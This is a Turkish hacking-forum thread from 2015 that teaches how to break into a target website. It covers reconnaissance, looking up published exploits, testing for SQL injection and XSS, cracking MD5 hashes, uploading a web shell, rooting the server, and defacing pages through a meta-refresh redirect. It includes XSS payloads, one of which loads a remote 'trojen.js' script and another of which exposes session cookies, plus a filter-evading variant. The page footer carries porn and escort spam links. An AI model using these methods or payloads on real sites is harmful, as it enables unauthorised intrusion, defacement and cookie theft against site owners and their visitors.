KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Hedef Site Hack Oku!
Konu : Hedef Site Hack Oku! - 10.10.2015, 10:40
Mesaj: #1
[size=4]Hedef Site Hack Oku !![/size]

Arkadaşlar Bu Yazımda Sizlere Hedef Site Hack Hakkında Bilgi Vericem Öncelikle Programla Hack Olmaz Demeyin onuda yardımcı elaman olarak kullanıyoruz Programla Şöyle Olur Anlatayım Program Hep Yardımcı Elamandır...

Kısa Bir Sekılde Anlatacagım sizlere önce Hedef site http://www.siteadı.com hedef site bu öncelikle ne yapmamız gerekli onu anlatacağım 
Oncelikle Hedef Sitenizi Tanımamız Gerekiyor...
Sitemiz Hangi Dilde Yazılmış?

Php,html,asp
http://www.siteadı.com/index.asp yazdık acılmadı
http://www.siteadı.com/index.html yazdık acılmadı
http://www.siteadı.com/index.php Yazdık acıldı site dili php oldugunu ögrendık şimdide Özel Bir Scripti Var Mı yokmu ona bakacagız 
vbulletin,mybb,smf,wordpresss,joomla
Yada Öteki Piyasada Bulunan Scriptlerden Birinemi Ait?
Kişisel ve Firmasal Scriptler veya Diğer Scriptlermi diye bakacagız.
kısa bir yol daha war 

http://www.siteadı.com/robots.txt yazdın genelde hazır sistem oldugunda admin girişini veriyor admin giriş bilgisinde ögrenebilirsiniz.

Eğer Scriptini Bulduysanız Simdi O Scriptte Daha Önceden Bulunmuş Açık Var Mı Ona Bakalım Bunu Öğenmek İçin Su Sitelerde Script Adını Aratacagız....

-- exploit-db.com
-- 1337day.com (Yeni Milw0rm)

En Popüler ve İlgi Gören Exploit Siteleri Buralardır...Bunlann Dışında Başka Sitelerde De Aratabilirsiniz
Burdan Güncel bir acık vermedı ozaman kendımız manuel arıyacagız...
Arayacağımız Muhtemel Açıklar ;

Cpnel Brute
Wordpres Brute
joomla brute
XSS Bugs
Sql Bugs
XSRF-CSRF Bugs
Rfi Bugs
Lfi Bugs
Upload Bugs
Html Injection Bugs vs güncel bildigim acıkları denıyoruz

site üzerinde odamı olmadı programlarla acık taratıyoruz acık arama programları ile bir acık acık yok ise site ozaman ne yapacagız serverdeki diger sitelerde acık arıyacagız nasılmı sitelerine hedef site veriyoruz http://www.siteadı.com veriyoruz onlar cekıyor sıtelerı..

http://urltara.com/
http://www.yougetsignal.com/ 

sitelerde taratıp serverdki siteleri tek tek denıyoruz bildigimiz Muhtemel Açıklar yöntemleri denıyoruz oda olamdı programla acık arıyoruz bir acık bulduk aradıgımız yöntemlerde verdi sql acıgı verdi md5 'e ulaşdık hemen kırmayı denıyoruz yapacagız googlede bir cok md5 cracker kırma onlıe siteler var ve bir cok perl pyhton dlinde kodlanmıs scpritler var orda kırabilirmisiniz ewet kırdık md5 panele daldık şimdi ne yapacagız..
Panele Daldıktan Sonraki Yapılacaklar Neler ? Napıcaz ? 


- Shell Upload Ediyoruz
shell yerse serverde bypas , config , forbin , root oluyoruz hedef siteye ulaşmak için ewet bypas vb gibi olamdı root oluyoruz gereklı kernel sürümünü bulup rootladık hedef siteye ulaşdık shellden sql baglanıp admın girişlerini degiştik ve hedef siteyi hackledık varsayalım shell yemıyor...

YouTube Video

YouTube Video

YouTube Video


Shell yukleme Olmuyor Mu ?
- Hacklediğimiz Bir Siteye Yönlendirerek İndeximizi Açıyoruz Ama Nasıl ? Aşağıdaki 
Kodu Ana Sayfadaki Bir Dökümana Ekleyerek..


Mesajdan yapılan alıntı:
Alıntı.
<**** http-equiv='refresh" content="5;URL=http://www.yonleneceksite.com'>

2 Sayısı Kaç Saniyede Sitemizin Açılacağını Ayarlar.

sql arama yöntemleri..
burdan ögrenmek istiyenler sql
sql Açıklarını Tarayalım
Sql Bug Olması İçin Öncefikle Sitede id Değerlerinin Bulunması Gerek.
Su Şekilde Yani ;

PHP- Kodu:
Kod:
.php?id=
.asp?id=
.aspx?id=  



Bunlar Gibi ID Değerleri Varsa Sitemizde Muhtemel Sql Açığı BuIunabílir...Açık Olup Olmadığını Anlamak için ID Değerinin Sonuna 'a (tırnak işareti) Kuyup ErıIserlıyoruz...Eğer Site Hata veriyorsa Muhtemel acık Vardır...
Bu Takdirde Siteye Manuel Yada Programlarla Sql Injection Yapabilirsiniz...
Bazen Error Vermeyebilir,Yada Verir De Siz Göremezsiniz...Bu Sefer Eğer Sql Olduğurıa İnaniyorsaniz
Blind Sql Injection Deneyebilirsiniz.Yada acık arma programına veya sql acık arama programına Atabílirsiniz acık bulmaya calısırız..


Sonra Xss Açıklarını Tarıyalım
Gene ID Değeri Yada Arama Sayfası Lazım Bize...
Buralara Javascript Kodlarını Direkt Olarak Girerek Yahut Enoode Edip Girerek Error Verdirebiliyorsak
Anlayın Ki Açık Vardır...

- O Güzel Javasaipt Kodumuz Bu ;

Kod:
<script>alert('archavin')</script>

Nasıl yedireceğimize gelince:
ID Değerlerinin Sonuna Ekleyip Enterlıyabiliriz Yada Search.php?q= Böyle Bir Değerin Sonuna Ekleyerek
Enterlıyabiliriz...
Bunu Char vb Algoritrııalarla Şifreleyerek De Girebifiriz...Bu Şekilde Filtrelerneyi De Aşmış Oluruz...

- Yani Bu Şekilde ;

PHP- Kodu:
Kod:
<script>alert('string.fromcharcode(66, 111, 122, 107, 117, 114, 116, 57, 55)')</script>  



- Eğer Site Bize Javascript Uyarısı Veriyoısa Açık Var Demektir -Bu Şekilde Servera Zararlı Kod Bile
Yedirebíliriz...

Kod:
<script scr=http://cyberizm.org/trojen.js></script>

- Bu Şekilde De Yazılıma Ait Çerez Bilgisi ni Kutucuğa Yansıtabiliriz...
Kod:
<script>alert(document.cookie);</script>

Çerezler (Cookie) zayıf http protokolünün oturum durumunun kontrolünü ve kirnlîk doğrulamayı sağlayan
zayıf bileşenleridir. Saãdıgan eğer sayfayı ziyaret eden kullanıcılann Çerez bilgisini okuyup kaydedebilirse
kendi bilgileri İle yerlerini değişlirerek kurbanın yetkilerine Ulaşabilir.Çerez Bilgisi Çalma Konusu
Sitemizde Mevcuttur.


Sosyal Mühendislik (SM) Yöntemi İle Hack

Eğer Zekanızı Kullanırsanız Emin Olun Bu Yöntemle Hackleyemeyeceğiniz Site Yoktur.
Güvenlik Zincirinin En Zayıf Halkası İnsandır.Bir Zincirin Halkalarından Birinin Kopması, Zincirin
Parçalanmasına Yeter. Bunu Dünyanın En İyi Sosyal Mühendislikci Hackerı Söylemiştir Benimde Foveri Sözümdür

Admini Deneyerek Yada Kandırarak Yapılan Yöntemdir.

[/color]

WWW Alıntı ile Cevapla
Konu : Hedef Site Hack Oku! - 10.10.2015, 10:51
Mesaj: #2
Alıntıdır yaz

WWW Alıntı ile Cevapla
Konu : Hedef Site Hack Oku! - 06.11.2015, 05:08
Mesaj: #3
nerden alıntı yapmış acaba

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno